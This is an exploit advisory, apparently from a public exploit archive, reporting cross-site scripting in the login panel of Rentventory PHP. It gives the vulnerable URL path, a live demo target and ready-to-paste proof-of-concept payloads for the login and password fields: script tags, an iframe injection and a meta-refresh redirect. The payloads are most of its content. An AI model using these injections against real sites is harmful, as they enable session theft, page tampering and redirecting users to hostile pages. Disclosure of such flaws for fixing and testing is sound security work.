Rentventory PHP suffers from cross site scripting vulnerabilities.
7187e4053bb9f1cf4c33c883fb5aff6d5c632b96e2cb644be3059ef55c03ed27
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________
# [+] Rentventory PHP (Login) Remote Xss Injection
# [+] Author : 599eme Man
# [+] Contact : flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Str0zen, Pr0H4ck3rz...
#[--------------------------------------------------------------]
#
# [+] Exploit :
#
# http://www.site.com/index.php?return=admin&panel=login
#
# P0c :
#
# Xss :
#
# => Login : <script>alert('xss')</script>
# => Password : <script>alert('xss')</script>
#
# Iframe :
#
# => Login : <iframe src="http://google.com"></iframe>
# => Password : <iframe src="http://google.com"></iframe>
#
# Redirect :
#
# => Login : <meta http-equiv="Refresh" content="0; url=http://www.google.com">
# => Password : <meta http-equiv="Refresh" content="0; url=http://www.google.com">
######################################################################################
[+] Demo
http://www.rentventory.com/demo/index.php?return=admin&panel=login
_________________________________________________________________
Vous voulez savoir ce que vous pouvez faire avec le nouveau Windows Live ? Lancez-vous !
http://www.microsoft.com/windows/windowslive/default.aspx